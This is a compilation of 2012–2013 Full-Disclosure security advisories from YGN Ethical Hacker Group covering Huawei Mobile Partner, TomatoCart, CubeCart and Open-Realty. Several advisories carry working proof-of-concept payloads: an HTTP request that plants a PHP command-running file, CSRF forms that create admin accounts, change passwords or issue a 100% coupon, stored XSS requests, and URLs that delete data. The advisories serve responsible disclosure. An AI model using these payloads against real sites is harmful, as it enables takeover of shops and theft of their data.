[Full-disclosure] Huawei Mobile Partner | Permission Weakness Local Privilege Escalation
1. DESCRIPTION Huawei Mobile Partner application contains a flaw that may allow an attacker to gain access to unauthorized privileges. The issue is due to the application installing with insecure permissions. This allows a less privileged local attacker or compromised process to replace the original application binary with a malicious application which will be executed by a victim user or upon Mobile Partner application Windows service restart. 2. BACKGROUND Mobile Partner is a built-in application in Huawei 3G USB modems that allow you to connect to the 3G mobile network for Internet access. It is widely used by many telcos round the world. 3. VERSIONS AFFECTED Tested version: 23.007.09.00.203. 4. PROOF-OF-CONCEPT/EXPLOIT Tested on Windows c:\wmic service get pathname | find Mobile Partner C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe c:\accesschk -q C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe RW Everyone RW BUILTIN\Users c:\accesschk -q C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe RW Everyone RW BUILTIN\Users c:\accesschk -q C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe RW Everyone RW BUILTIN\Users /// Tested on Mac YEHG:MacOS tester$ ls -Rl /Applications/Mobile\ Partner.app/ | grep rwxrwxrwx | grep \(app\|mobilepartner\) -rwxrwxrwx 1 root admin 82496 Oct 6 17:34 mobilepartner drwxrwxrwx 3 root admin 102 Oct 6 17:34 XStartScreen.app drwxrwxrwx 3 root admin 102 Oct 6 17:34 LiveUpd.app drwxrwxrwx 3 root admin 102 Oct 6 17:34 ouc.app 5. SOLUTION The vendor has not responded to our security report for months. Workaround is to remove WRITE attribute permission on all Mobile Partner executable files for non-administrator and non-system accounts. 6. VENDOR Huawei Technologies Co.,Ltd 7. CREDIT Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 8. DISCLOSURE TIME-LINE 2012-10-xx: Contacted the vendor through publicly mentioned emails and forums 2013-02-11: No response 2013-02-11: Vulnerability not fixed 2013-02-11: Vulnerability disclosed 9. REFERENCES Original Advisory URL: http://core.yehg.net/lab/pr0js/advisories/huawei_mobile_partner-insecure_permission #yehg [2013-02-11] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TomatoCart 1.x | Cross Site Request Forgery Protection Bypass via JavaScript Hijacking
1. OVERVIEW TomatoCart 1.x versions are vulnerable to Cross Site Request Forgery Protection Bypass. 2. BACKGROUND TomatoCart is an innovative Open Source shopping cart solution developed by Wuxi Elootec Technology Co., Ltd. It is forked from osCommerce 3 as a separate project and is released under the GNU General Public License V2. Equipped with the web2.0 Technology Ajax and Rich Internet applications (RIAs), TomatoCart Team is devoted to building a landmark eCommerce solution. 3. VULNERABILITY DESCRIPTION TomatoCart 1.x versions contain a flaw related to the script '/admin/tocdesktop.php' failure to properly protect the JavaScript object, token which is used to prevent Cross Site Request Forgery attack. This allows an attacker to gain access to the token object via JavaScript Hijacking upon an administrator user's visit to his crafted page. Using the compromised token value, the attacker will then be able to perform administrator-privileged functions such as uploading file, creating user accounts and so forth. 4. VERSIONS AFFECTED Tested on 1.x (Note that we did not verify this issue on upcoming 2.x version - currently it's on alpha.) 5. PROOF-OF-CONCEPT/EXPLOIT The following recorded movie will demonstrate how we can leverage the CSRF-bypass flaw to create an arbitrary shell script. http://yehg.net/lab/pr0js/training/view/misc/TomatoCart-Anti-CSRF-Bypass-2-Shell/ 6. SOLUTION The vendor did not show commitment in hardening the application. Workaround is not to visit malicious web sites during login or to use a dedicated browser for TomatoCart administration. It is recommended to use alternative shopping cart application with good track record of security fixes. 7. VENDOR Wuxi Elootec Technology Co., Ltd. 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-04-22: Contacted the vendor through email 2012-04-29: Vendor replied and the vulnerability information was sent 2013-01-07: Vulnerability not fixed 2013-01-07: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_ant-csrf_bypass Other TomatoCart Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation Other TomatoCart Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_vulnerable_piwik TomatoCart Home Page: http://www.tomatocart.com/ #yehg [2013-01-07] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TomatoCart 1.x | Vulnerable Piwik Extension
1. OVERVIEW TomatoCart 1.x versions include outdated and vulnerable Piwik extension 0.5.5. 2. BACKGROUND TomatoCart is an innovative Open Source shopping cart solution developed by Wuxi Elootec Technology Co., Ltd. It is forked from osCommerce 3 as a separate project and is released under the GNU General Public License V2. Equipped with the web2.0 Technology Ajax and Rich Internet applications (RIAs), TomatoCart Team is devoted to building a landmark eCommerce solution. 3. VULNERABILITY DESCRIPTION TomatoCart 1.x versions include outdated and vulnerable Piwik extension 0.5.5 according to the the Piwik SVN checkout date specified in /ext/piwik/index.php. This Piwik version has known vulnerabilities such as Cross Site Scripting, Arbitrary URL Redirect and Denial-of-Service. 4. VERSIONS AFFECTED 1.x 5. PROOF-OF-CONCEPT/EXPLOIT Refer to REFERENCES section for the OSVDB site URL featuring known Piwik vulnerabilities. 6. SOLUTION The vendor did not show commitment in hardening the application. It is recommended to use alternative shopping cart application with good track record of security fixes. 7. VENDOR Wuxi Elootec Technology Co., Ltd. 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-04-22: Contacted the vendor through email 2012-04-29: Vendor replied and the vulnerability detail was sent 2013-01-05: Vulnerability not fixed 2013-01-05: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation TomatoCart Home Page: http://www.tomatocart.com/ Piwik Reported Vulnerabilities: http://osvdb.org/search/search?search%5Bvuln_title%5D=piwiksearch%5Btext_type%5D=alltextsearch%5Bs_date%5D=January+1%2C+2010search%5Be_date%5D=January+5%2C+2013 #yehg [2013-01-05] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TomatoCart 1.x | Unrestricted File Creation
1. OVERVIEW TomatoCart 1.x versions are vulnerable to Unrestricted File Creation. 2. BACKGROUND TomatoCart is an innovative Open Source shopping cart solution developed by Wuxi Elootec Technology Co., Ltd. It is forked from osCommerce 3 as a separate project and is released under the GNU General Public License V2. Equipped with the web2.0 Technology Ajax and Rich Internet applications (RIAs), TomatoCart Team is devoted to building a landmark eCommerce solution. 3. VULNERABILITY DESCRIPTION TomatoCart 1.x versions contain a flaw related to the /admin/json.php script's failure to properly restrict created files. This may allow an attacker to create arbitrary shell script to launch further attacks on the application server. 4. VERSIONS AFFECTED Tested on 1.1.8, 1.1.5 5. PROOF-OF-CONCEPT/EXPLOIT / POST /admin/json.php HTTP/1.1 Host: localhost Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14 Content-Type: application/x-www-form-urlencoded Content-Length: 195 module=file_manageraction=save_filefile_name=0wned.phpdirectory=/token=edfd1d6b88d0c853c2b83cc63aca5e14ext-comp-1277=0wned.phpcontent=?+echo 'h10wned!/h1pre';+echo `ls+-al`; ? /// 6. SOLUTION The vendor did not show commitment in hardening the application. It is recommended to use alternative shopping cart application with good track record of security fixes. 7. VENDOR Wuxi Elootec Technology Co., Ltd. 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-04-22: Contacted the vendor through email 2012-04-29: Vendor replied and the vulnerability detail was sent 2013-01-04: Vulnerability not fixed 2013-01-04: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation TomatoCart Home Page: http://www.tomatocart.com/ #yehg [2013-01-04] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CubeCart 5.0.7 and lower versions | Insecure Backup File Handling
5.x only
On Sat, Dec 29, 2012 at 11:02 AM, Sean Jenkins s...@bluehost.com wrote:
Is it known if this exploit affects CubeCart versions 3.x and/or 4.x, or
just 5.0.[0..6]?
Sean Jenkins
Sr. System Administrator
On 12/28/2012 8:13 AM, YGN Ethical Hacker Group wrote:
1. OVERVIEW
CubeCart 5.0.7 and lower versions are vulnerable to Insecure Backup
File Handling which leads to the disclosure of the application
configuration file.
2. BACKGROUND
CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.
3. VULNERABILITY DESCRIPTION
CubeCart 5.0.7 and lower versions contain a flaw that insecurely backs
up the configuration file, global.inc.php, upon new installation or
upgrade process. The name of backup configuration file is set to the
year, month, day, hour, minute that the process is performed. The
non-randomized nature of this backup scheme allows an attacker to
retrieve the file through brute-force method.
4. VERSIONS AFFECTED
5.0.7 and lower versions
5. Affected Files
/setup/setup.install.php
/setup/setup.upgrade.php
///CODE //
##Backup existing config file, if it exists
if (file_exists($global_file)) {
rename($global_file, $global_file.'-'.date('Ymdgi'));
}
/
e.g.
http://127.0.0.1/cube507/includes/global.inc.php-2012021245719 \
6. SOLUTION
Upgrade to the latest CubeCart version - 5.x.
7. VENDOR
CubeCart Development Team
http://cubecart.com/
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2012-03-24: Vulnerability reported
2012-12-28: Vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_insecure-backup
CubeCart Home Page: http://cubecart.com/
#yehg [2012-12-28]
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 5.x | Cross Site Request Forgery (CSRF) Vulnerability
1. OVERVIEW CubeCart 5.x versions are vulnerable to Cross Site Request Forgery (CSRF). 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION CubeCart 5.x versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for majority of administrator functions such as adding new user, assigning user to administrative privilege. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification. 4. VERSIONS AFFECTED 5.x 5. Proof-of-Concept http://localhost/admin.php?_g=documentsnode=indexdelete=1 (Delete file in Site Documents) http://localhost/admin.php?_g=filemanagermode=digitaldelete=1 (Delete file in File Manager) http://localhost/admin.php?_g=settingsnode=adminsaction=editadmin_id=2 (Delete user) http://localhost/admin.php?_g=customerssort%5Bregistered%5D=DESCaction=deletecustomer_id=1 (Delete customer user) http://localhost/admin.php?_g=productssort%5Bupdated%5D=DESCdelete=1 (Delete product) 6. SOLUTION The vendor has chosen not to fix the issue. Workaround is not to visit malicious sites during log-in. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-12-22: Vulnerability disclosed 2012-12-24: The vendor replied that the fix would not be implemented. 2013-01-01: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5x%5D_csrf CubeCart Home Page: http://cubecart.com/ #yehg [2013-01-01] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 5.x | Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW CubeCart 5.x versions are vulnerable to Cross Site Scripting. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION Multiple parameters are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 5.x 5. Affected URLs and Parameters /admin.php (report[date][from] parameter] /admin.php (report[date][to] parameter) /index.php (review[email] parameter) /index.php (review[name] parameter) /index.php (review[title] parameter) /admin.php (report[date][from] parameter) 6. SOLUTION The vendor has chosen not to fix the issue. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-12-22: Vulnerability disclosed 2012-12-24: The vendor replied that the fix would not be implemented. 2013-01-01: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5x%5D_xss CubeCart Home Page: http://cubecart.com/ #yehg [2013-01-01] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 5.0.7 and lower versions | Insecure Backup File Handling
1. OVERVIEW
CubeCart 5.0.7 and lower versions are vulnerable to Insecure Backup
File Handling which leads to the disclosure of the application
configuration file.
2. BACKGROUND
CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.
3. VULNERABILITY DESCRIPTION
CubeCart 5.0.7 and lower versions contain a flaw that insecurely backs
up the configuration file, global.inc.php, upon new installation or
upgrade process. The name of backup configuration file is set to the
year, month, day, hour, minute that the process is performed. The
non-randomized nature of this backup scheme allows an attacker to
retrieve the file through brute-force method.
4. VERSIONS AFFECTED
5.0.7 and lower versions
5. Affected Files
/setup/setup.install.php
/setup/setup.upgrade.php
///CODE //
##Backup existing config file, if it exists
if (file_exists($global_file)) {
rename($global_file, $global_file.'-'.date('Ymdgi'));
}
/
e.g.
http://127.0.0.1/cube507/includes/global.inc.php-2012021245719 \
6. SOLUTION
Upgrade to the latest CubeCart version - 5.x.
7. VENDOR
CubeCart Development Team
http://cubecart.com/
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2012-03-24: Vulnerability reported
2012-12-28: Vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_insecure-backup
CubeCart Home Page: http://cubecart.com/
#yehg [2012-12-28]
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Open-Realty CMS 3.x | Cross Site Request Forgery (CSRF) Vulnerability
1. OVERVIEW Open-Realty CMS 3.x versions are vulnerable to Cross Site Request Forgery. 2. BACKGROUND Open-Realty is the world's leading real estate listing marketing and management CMS application, and has enjoyed being the real estate web site software of choice for professional web site developers since 2002. 3. VULNERABILITY DESCRIPTION Open-Realty 3.x versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for majority of administrator functions such as adding new user, assigning user to administrative privilege. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification. 4. VERSIONS AFFECTED 3.x 5. PROOF-OF-CONCEPT/EXPLOIT !-- Change Password -- form action=http://127.0.0.1/admin/ajax.php?action=ajax_update_user_data; method=POST input type=hidden name=user#95;id value=2 / input type=hidden name=user#95;first#95;name value=Well / input type=hidden name=user#95;last#95;name value=Smith / input type=hidden name=user#95;email value=hacker#64;yehg.net / input type=hidden name=phone value=123456789 / input type=hidden name=mobile value=9151403793 / input type=hidden name=fax value= / input type=hidden name=homepage value=http#58;#47;#47;yehg.net / input type=hidden name=info value=test / input type=hidden name=edit#95;user#95;pass value=agent / input type=hidden name=edit#95;user#95;pass2 value=agent / input type=submit value=Submit form / /form script document.forms[0].submit(); /script 6. SOLUTION The vendor has not responded to the report since 2012-11-17. It is recommended that an alternate software package be used in its place. 7. VENDOR Transparent Technologies Inc. http://www.transparent-support.com 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-11-17: Vulnerability Reported 2012-12-25: Vulnerability Disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_3.x%5D_csrf Open-Realty Home Page: http://www.open-realty.org/ #yehg [2012-12-25] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Open-Realty CMS 3.x | Persistent Cross Site Scripting (XSS) Vulnerability
1. OVERVIEW
Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site
Scripting (XSS).
2. BACKGROUND
Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.
3. VULNERABILITY DESCRIPTION
Multiple parameters are not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
4. VERSIONS AFFECTED
3.x
5. PROOF-OF-CONCEPT/EXPLOIT
/admin/ajax.php (parameter: title, full_desc, ta)
///
POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1
Host: localhost
Content-Length: 574
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7;
edit=7305title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3Estate=AKzip=222country=neighborhood=price=beds=baths=floors=year_built=garage_size=sq_feet=lot_size=prop_tax=status=Activemls=full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3Eseotitle=test-7002edit_active=yesmlsexport=noor_owner=2notes=66address=aaacity=aaastate=AKzip=222country=neighborhood=price=beds=baths=floors=year_built=garage_size=sq_feet=lot_size=prop_tax=status=Activemls=home_features%5B%5D=community_features%5B%5D=openhousedate=
///
POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 112
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/admin/index.php?action=edit_blog_postid=65
Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09;
blogID=65title=about+usta='scriptalert('Error')/scriptdescription=keywords=status=1seotitle=about-us
///
6. SOLUTION
The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.
7. VENDOR
Transparent Technologies Inc.
http://www.transparent-support.com
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xss
Open-Realty Home Page: http://www.open-realty.org/
#yehg [2012-12-25]
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 5.0.7 and lower | Open URL Redirection Vulnerability
1. OVERVIEW CubeCart 5.0.7 and lower versions are vulnerable to Open URL Redirection. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION CubeCart 5.0.7 and lower versions contain a flaw that allows a remote cross site redirection attack. This flaw exists because the application does not properly sanitise the redir parameter. This allows an attacker to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choice. 4. VERSIONS AFFECTED 5.0.7 and lower 5. Affected URL and Parameter /admin.php (redir parameter) /admin.php?redir=//yehg.net/%3f (Redirect after login) 6. SOLUTION Upgrade to the latest CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-03-24: Vulnerability reported 2012-12-24: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_open_url_redirection CubeCart Home Page: http://cubecart.com/ #yehg [2012-12-24] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 4.4.6 and lower | Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW CubeCart 4.4.6 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION Multiple parameters are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 4.4.6 and lower 5. Affected URLs and Parameters /admin.php (countiesPage parameter) /admin.php (countriesPage parameter) /admin.php (dStart parameter) /admin.php (edit parameter) /admin.php (email parameter) /admin.php (FCKeditor parameter) /admin.php (gc%5Bmax%5D parameter) /admin.php (gc%5Bmin%5D parameter) /admin.php (gc%5BproductCode%5D parameter) /admin.php (gc%5Bweight%5D parameter) /admin.php (gc[max] parameter) /admin.php (gc[min] parameter) /admin.php (gc[productCode] parameter) /admin.php (gc[weight] parameter) /admin.php (loc] /admin.php (page parameter) /admin.php (prod_master_id parameter) /admin.php (searchStr parameter) /admin.php (thumbName[] parameter) /admin.php (User-Agent HTTP header) /admin.php (yStart parameter) /index.php (Referer HTTP header) 6. SOLUTION The CubeCart 4.x version family is no longer maintained by the vendor. Upgrade to the currently supported latest CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle 2012-12-24: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_xss CubeCart Home Page: http://cubecart.com/ CubeCart Bug-Fix Announcement: http://forums.cubecart.com/topic/45456-cubecart-447-released/ CubeCart4 End-of-Life Announcement: http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/ #yehg [2012-12-24] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 4.4.6 and lower | Multiple SQL Injection Vulnerabilities
1. OVERVIEW The CubeCart 4.4.6 and lower versions are vulnerable to SQL Injection. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION Multiple parameters are not properly sanitized, which allows attacker to conduct SQL Injection attack. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. 4. VERSIONS AFFECTED 4.4.6 and lower 5. Affected URLs and Parameters /admin.php (active parameter) /admin.php (cat_id parameter) /admin.php (orderCol parameter) /admin.php (orderDir parameter) 6. SOLUTION The CubeCart 4.x version family is no longer maintained by the vendor. Upgrade to the currently supported latest CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle 2012-12-24: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_sqli CubeCart Home Page: http://cubecart.com/ CubeCart Bug-Fix Announcement: http://forums.cubecart.com/topic/45456-cubecart-447-released/ CubeCart4 End-of-Life Announcement: http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/ #yehg [2012-12-24] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 4.4.6 and lower | Cross Site Request Forgery (CSRF) Vulnerability
1. OVERVIEW CubeCart 4.4.6 and lower versions are vulnerable to Cross Site Request Forgery (CSRF). 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION CubeCart 4.4.6 and and lower versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for majority of administrator functions such as adding new user, assigning user to administrative privilege. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification. 4. VERSIONS AFFECTED 4.4.6 and lower 5. Proof-of-Concept Add Admin User == form action=http://localhost/admin.php?_g=adminusers/administrators; method=POST enctype=multipart/form-data input type=hidden name=name value=hacker / input type=hidden name=adminUsername value=hacker / input type=hidden name=email value=hacker#64;yehg#46;net / input type=hidden name=adminPassword value=h#64;ck3er / input type=hidden name=adminPassword#95;verify value=h#64;ck3er / input type=hidden name=isSuper value=#45; / input type=hidden name=notes value=#13; / input type=hidden name=adminId value=#13; / input type=hidden name=Submit value=Add#32;User / input type=submit value=Submit form / /form Add Coupon == form action=http://localhost/admin.php?_g=products/coupons; method=POST input type=hidden name=code value=HACKER / input type=hidden name=discount#95;percent value=100 / input type=hidden name=discount#95;price value= / input type=hidden name=expires value=3000#47;12#47;30 / input type=hidden name=allowed#95;uses value=0 / input type=hidden name=count value=0 / input type=hidden name=desc value=0 / input type=hidden name=id value= / input type=hidden name=Submit value=Edit#32;Coupon / input type=submit value=Submit form / /form 6. SOLUTION The CubeCart 4.x version family is no longer maintained by the vendor. Upgrade to the currently supported latest CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle 2012-12-24: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_csrf CubeCart Home Page: http://cubecart.com/ CubeCart Bug-Fix Announcement: http://forums.cubecart.com/topic/45456-cubecart-447-released/ #yehg [2012-12-24] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | 